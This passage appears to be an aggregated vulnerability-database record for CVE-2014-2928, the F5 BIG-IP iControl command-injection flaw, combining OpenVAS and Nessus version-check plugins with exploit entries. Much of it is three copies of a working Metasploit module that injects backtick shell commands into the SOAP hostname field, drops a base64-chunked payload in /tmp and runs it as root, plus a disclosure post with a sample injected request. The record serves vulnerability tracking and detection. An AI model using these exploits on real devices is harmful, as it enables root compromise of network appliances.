\"cpe:/h:f5:big-ip\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.105232\");\n script_cve_id(\"CVE-2014-2928\");\n script_tag(name:\"cvss_base\", value:\"7.1\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_version(\"2020-04-03T06:15:47+0000\");\n\n script_name(\"F5 BIG-IP - iControl vulnerability\");\n\n script_xref(name:\"URL\", value:\"https://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html\");\n\n script_tag(name:\"impact\", value:\"Users may be able to run arbitrary commands on a BIG-IP system using an authenticated iControl connection.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The iControl API in F5 BIG-IP allows remote administrators to execute arbitrary commands via shell metacharacters\nin the hostname element in a SOAP request.\");\n\n script_tag(name:\"solution\", value:\"See the referenced vendor advisory for a solution.\");\n\n script_tag(name:\"summary\", value:\"F5 Big-IP is prone to an authenticated code execution vulnerability\");\n script_tag(name:\"affected\", value:\"F5 BIG-IP before 11.6.0\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"last_modification\", value:\"2020-04-03 06:15:47 +0000 (Fri, 03 Apr 2020)\");\n script_tag(name:\"creation_date\", value:\"2015-03-09 12:19:05 +0100 (Mon, 09 Mar 2015)\");\n script_category(ACT_GATHER_INFO);\n script_family(\"F5 Local Security Checks\");\n script_copyright(\"Copyright (C) 2015 Greenbone Networks GmbH\");\n script_dependencies(\"gb_f5_big_ip_version.nasl\");\n script_mandatory_keys(\"f5/big_ip/version\", \"f5/big_ip/active_modules\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"list_array_func.inc\");\ninclude(\"f5.inc\");\n\nif( ! version = get_app_version( cpe:CPE ) )\n exit( 0 );\n\ncheck_f5['LTM'] = make_array( 'affected', '11.0.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;11.2.1_HF15;10.0.0-10.2.4;' );\n\ncheck_f5['AAM'] = make_array( 'affected', '11.4.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;' );\n\ncheck_f5['AFM'] = make_array( 'affected', '11.3.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;' );\n\ncheck_f5['AVR'] = make_array( 'affected', '11.0.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;11.2.1_HF15;' );\n\ncheck_f5['APM'] = make_array( 'affected', '11.0.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;11.2.1_HF15;10.1.0-10.2.4;' );\n\ncheck_f5['ASM'] = make_array( 'affected', '11.0.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;11.2.1_HF15;10.0.0-10.2.4;' );\n\ncheck_f5['GTM'] = make_array( 'affected', '11.0.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;11.2.1_HF15;10.0.0-10.2.4;' );\n\ncheck_f5['LC'] = make_array( 'affected', '11.0.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;11.2.1_HF15;10.0.0-10.2.4;' );\n\ncheck_f5['PEM'] = make_array( 'affected', '11.3.0-11.5.1;',\n 'unaffected', '11.6.0;11.5.2;' );\n\ncheck_f5['PSM'] = make_array( 'affected', '11.0.0-11.4.1;',\n 'unaffected', '11.2.1_HF15;10.0.0-10.2.4;' );\n\ncheck_f5['WAM'] = make_array( 'affected', '11.0.0-11.3.0;',\n 'unaffected', '11.2.1_HF15;10.0.0-10.2.4;' );\n\ncheck_f5['WOM'] = make_array( 'affected', '11.0.0-11.3.0;',\n 'unaffected', '11.2.1_HF15;10.0.0-10.2.4;' );\n\nif( report = f5_is_vulnerable( ca:check_f5, version:version ) ) {\n security_message( port:0, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}], "zdt": [{"lastseen": "2018-01-05T17:03:38", "description": "This Metasploit module exploits an authenticated remote command execution vulnerability in the F5 BIGIP iControl API (and likely other F5 devices).", "edition": 2, "published": "2014-10-09T00:00:00", "type": "zdt", "title": "F5 iControl Remote Root Command Execution Exploit", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2928"], "modified": "2014-10-09T00:00:00", "id": "1337DAY-ID-22734", "href": "https://0day.today/exploit/description/22734", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"F5 iControl Remote Root Command Execution\",\r\n 'Description' => %q{\r\n This module exploits an authenticated remote command execution\r\n vulnerability in the F5 BIGIP iControl API (and likely other\r\n F5 devices).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bperry' # Discovery, Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-2928'],\r\n ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']\r\n ],\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['F5 iControl', {}]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => \"Sep 17 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true]),\r\n OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),\r\n OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n get_hostname = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:get_hostname xmlns:n1=\"urn:iControl:System/Inet\" />\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\r\n }\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => get_hostname,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n res.body =~ /y:string\">(.*)<\\/return/\r\n hostname = $1\r\n send_cmd(\"whoami\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => get_hostname,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n res.body =~ /y:string\">(.*)<\\/return/\r\n new_hostname = $1\r\n\r\n if new_hostname == \"root.a.b\"\r\n pay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\r\n <hostname>#{hostname}</hostname>\r\n </n1:set_hostname>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\r\n }\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => pay,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def send_cmd(cmd)\r\n pay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\r\n <hostname>`#{cmd}`.a.b</hostname>\r\n </n1:set_hostname>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\r\n }\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => pay,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n end\r\n\r\n def exploit\r\n filename = Rex::Text.rand_text_alpha_lower(5)\r\n\r\n print_status('Sending payload in chunks, might take a small bit...')\r\n i = 0\r\n while i < payload.encoded.length\r\n cmd = \"echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}\"\r\n send_cmd(cmd)\r\n i = i + 5\r\n end\r\n\r\n print_status('Triggering payload...')\r\n\r\n send_cmd(\"sh /tmp/#{filename}\")\r\n end\r\nend\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22734"}, {"lastseen": "2018-04-12T23:57:30", "edition": 2, "description": "F5 iControl systems suffer from a remote command execution vulnerability.", "published": "2014-05-09T00:00:00", "type": "zdt", "title": "F5 iControl Remote Command Execution Vulnerability", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2928"], "modified": "2014-05-09T00:00:00", "id": "1337DAY-ID-22227", "href": "https://0day.today/exploit/description/22227", "sourceData": "Hi,\r\n\r\nLinked below is an advisory regarding remote command execution (as root,\r\npossibly) vulnerabilities within the iControl API:\r\n\r\nhttp://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html\r\n\r\n\r\nAn example request that will set the hostname to 'root.example.com':\r\n\r\n<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\r\n <hostname>`whoami`.example.com</hostname>\r\n </n1:set_hostname>\r\n </SOAP-ENV:Body>\r\n</SOAP-ENV:Envelope>\r\n\r\n\r\nThis was responsibly disclosed to F5 on the 7th of February. If you\r\nwould like the full communication timeline, feel free to ask.\n\n# 0day.today [2018-04-12] #", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/22227"}], "exploitdb": [{"lastseen": "2016-02-04T00:13:59", "description": "F5 iControl Remote Root Command Execution. CVE-2014-2928. Remote exploit for unix platform", "published": "2014-10-09T00:00:00", "type": "exploitdb", "title": "F5 iControl Remote Root Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2928"], "modified": "2014-10-09T00:00:00", "id": "EDB-ID:34927", "href": "https://www.exploit-db.com/exploits/34927/", "sourceData": "##\r\n# This module requires Metasploit: http//metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info={})\r\n super(update_info(info,\r\n 'Name' => \"F5 iControl Remote Root Command Execution\",\r\n 'Description' => %q{\r\n This module exploits an authenticated remote command execution\r\n vulnerability in the F5 BIGIP iControl API (and likely other\r\n F5 devices).\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'bperry' # Discovery, Metasploit module\r\n ],\r\n 'References' =>\r\n [\r\n ['CVE', '2014-2928'],\r\n ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']\r\n ],\r\n 'Platform' => ['unix'],\r\n 'Arch' => ARCH_CMD,\r\n 'Targets' =>\r\n [\r\n ['F5 iControl', {}]\r\n ],\r\n 'Privileged' => true,\r\n 'DisclosureDate' => \"Sep 17 2013\",\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(443),\r\n OptBool.new('SSL', [true, 'Use SSL', true]),\r\n OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),\r\n OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),\r\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'admin'])\r\n ], self.class)\r\n end\r\n\r\n def check\r\n get_hostname = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:get_hostname xmlns:n1=\"urn:iControl:System/Inet\" />\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\r\n }\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => get_hostname,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n res.body =~ /y:string\">(.*)<\\/return/\r\n hostname = $1\r\n send_cmd(\"whoami\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => get_hostname,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n res.body =~ /y:string\">(.*)<\\/return/\r\n new_hostname = $1\r\n\r\n if new_hostname == \"root.a.b\"\r\n pay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\r\n <hostname>#{hostname}</hostname>\r\n </n1:set_hostname>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\r\n }\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => pay,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n\r\n return Exploit::CheckCode::Vulnerable\r\n end\r\n\r\n return Exploit::CheckCode::Safe\r\n end\r\n\r\n def send_cmd(cmd)\r\n pay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\r\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\r\n <SOAP-ENV:Body>\r\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\r\n <hostname>`#{cmd}`.a.b</hostname>\r\n </n1:set_hostname>\r\n </SOAP-ENV:Body>\r\n </SOAP-ENV:Envelope>\r\n }\r\n\r\n send_request_cgi({\r\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\r\n 'method' => 'POST',\r\n 'data' => pay,\r\n 'username' => datastore['USERNAME'],\r\n 'password' => datastore['PASSWORD']\r\n })\r\n end\r\n\r\n def exploit\r\n filename = Rex::Text.rand_text_alpha_lower(5)\r\n\r\n print_status('Sending payload in chunks, might take a small bit...')\r\n i = 0\r\n while i < payload.encoded.length\r\n cmd = \"echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}\"\r\n send_cmd(cmd)\r\n i = i + 5\r\n end\r\n\r\n print_status('Triggering payload...')\r\n\r\n send_cmd(\"sh /tmp/#{filename}\")\r\n end\r\nend", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:HIGH/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/34927/"}], "metasploit": [{"lastseen": "2020-10-12T22:41:28", "description": "This module exploits an authenticated remote command execution vulnerability in the F5 BIGIP iControl API (and likely other F5 devices).\n", "published": "2014-09-27T15:40:13", "type": "metasploit", "title": "F5 iControl Remote Root Command Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-2928"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/HTTP/F5_ICONTROL_EXEC", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"F5 iControl Remote Root Command Execution\",\n 'Description' => %q{\n This module exploits an authenticated remote command execution\n vulnerability in the F5 BIGIP iControl API (and likely other\n F5 devices).\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'bperry' # Discovery, Metasploit module\n ],\n 'References' =>\n [\n ['CVE', '2014-2928'],\n ['URL', 'http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15220.html']\n ],\n 'Platform' => ['unix'],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n ['F5 iControl', {}]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => '2013-09-17',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptBool.new('SSL', [true, 'Use SSL', true]),\n OptString.new('TARGETURI', [true, 'The base path to the iControl installation', '/']),\n OptString.new('HttpUsername', [true, 'The username to authenticate with', 'admin']),\n OptString.new('HttpPassword', [true, 'The password to authenticate with', 'admin'])\n ])\n end\n\n def check\n get_hostname = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <SOAP-ENV:Body>\n <n1:get_hostname xmlns:n1=\"urn:iControl:System/Inet\" />\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n }\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\n 'method' => 'POST',\n 'data' => get_hostname,\n 'username' => datastore['HttpUsername'],\n 'password' => datastore['HttpPassword']\n })\n\n res.body =~ /y:string\">(.*)<\\/return/\n hostname = $1\n send_cmd(\"whoami\")\n\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\n 'method' => 'POST',\n 'data' => get_hostname,\n 'username' => datastore['HttpUsername'],\n 'password' => datastore['HttpPassword']\n })\n\n res.body =~ /y:string\">(.*)<\\/return/\n new_hostname = $1\n\n if new_hostname == \"root.a.b\"\n pay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <SOAP-ENV:Body>\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\n <hostname>#{hostname}</hostname>\n </n1:set_hostname>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n }\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\n 'method' => 'POST',\n 'data' => pay,\n 'username' => datastore['HttpUsername'],\n 'password' => datastore['HttpPassword']\n })\n\n return Exploit::CheckCode::Vulnerable\n end\n\n return Exploit::CheckCode::Safe\n end\n\n def send_cmd(cmd)\n pay = %Q{<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?>\n <SOAP-ENV:Envelope xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\">\n <SOAP-ENV:Body>\n <n1:set_hostname xmlns:n1=\"urn:iControl:System/Inet\">\n <hostname>`#{cmd}`.a.b</hostname>\n </n1:set_hostname>\n </SOAP-ENV:Body>\n </SOAP-ENV:Envelope>\n }\n\n send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'iControl', 'iControlPortal.cgi'),\n 'method' => 'POST',\n 'data' => pay,\n 'username' => datastore['HttpUsername'],\n 'password' => datastore['HttpPassword']\n })\n end\n\n def exploit\n filename = Rex::Text.rand_text_alpha_lower(5)\n\n print_status('Sending payload in chunks, might take a small bit...')\n i = 0\n while i < payload.encoded.length\n cmd = \"echo #{Rex::Text.encode_base64(payload.encoded[i..i+4])}|base64 --decode|tee -a /tmp/#{filename}\"\n send_cmd(cmd)\n i = i + 5\n end\n\n print_status('Triggering payload...')\n\n send_cmd(\"sh /tmp/#{filename}\")\n end\nend\n", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/f5_icontrol_exec.rb"}], "nessus": [{"lastseen": "2021-03-01T02:08:02", "description": "The iControl API in F5 BIG-IP LTM, APM, ASM, GTM, Link Controller, and\nPSM 11.0.0 through 11.5.1, BIG-IP AAM 11.4.0 through 11.5.1, BIG-IP\nAFM and PEM 11.3.0 through 11.5.1, BIG-IP Analytics 11.0.0 through\n11.5.1, BIG-IP Edge Gateway, WebAccelerator, WOM 11.0.0 through\n11.3.0, Enterprise Manager 3.0.0 through 3.1.1, and BIG-IQ Cloud,\nDevice, and Security 4.0.0 through 4.3.0 allows remote administrators\nto execute arbitrary commands via shell metacharacters in the hostname\nelement in a SOAP request. (CVE-2014-2928)\n\nImpact\n\nUsers may be able to run arbitrary commands on a BIG-IP system using\nan authenticated iControl connection.", "edition": 26, "published": "2014-10-10T00:00:00", "title": "F5 Networks BIG-IP : iControl vulnerability (K15220)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2928"], "modified": "2021-03-02T00:00:00", "cpe": ["cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/h:f5:big-ip_protocol_security_manager", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/h:f5:big-ip", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/a:f5:big-ip_access_policy_manager"], "id": "F5_BIGIP_SOL15220.NASL", "href": "https://www.tenable.com/plugins/nessus/78166", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution K15220.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(78166);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/05/09 9:52:02\");\n\n script_cve_id(\"CVE-2014-2928\");\n script_bugtraq_id(67278);\n script_xref(name:\"EDB-ID\", value:\"34927\");\n\n script_name(english:\"F5 Networks BIG-IP : iControl vulnerability (K15220)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The iControl API in F5 BIG-IP LTM, APM, ASM, GTM, Link Controller, and\nPSM 11.0.0 through 11.5.1, BIG-IP AAM 11.4.0 through 11.5.1, BIG-IP\nAFM and PEM 11.3.0 through 11.5.1, BIG-IP Analytics 11.0.0 through\n11.5.1, BIG-IP Edge Gateway, WebAccelerator, WOM 11.0.0 through\n11.3.0, Enterprise Manager 3.0.0 through 3.1.1, and BIG-IQ Cloud,\nDevice, and Security 4.0.0 through 4.3.0 allows remote administrators\nto execute arbitrary commands via shell metacharacters in the hostname\nelement in a SOAP request. (CVE-2014-2928)\n\nImpact\n\nUsers may be able to run arbitrary commands on a BIG-IP system using\nan authenticated iControl connection.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K15220\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution K15220.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:S/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'F5 iControl Remote Root Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/05/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"K15220\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.5.1\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.5.1\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.5.1\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\",\"11.2.1HF15\",\"10.1.0-10.2.4\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.5.1\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\",\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.5.1\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\",\"11.2.1HF15\");\n\n# GTM\nvmatrix[\"GTM\"] = make_array();\nvmatrix[\"GTM\"][\"affected\" ] = make_list(\"11.0.0-11.5.1\");\nvmatrix[\"GTM\"][\"unaffected\"] = make_list(\"11.6.0\",\"11.5.2\",\"11.2.1HF15\",\"10.0.0-10.2.4\");\n\n# LC\nvmatrix[\"LC\"] = 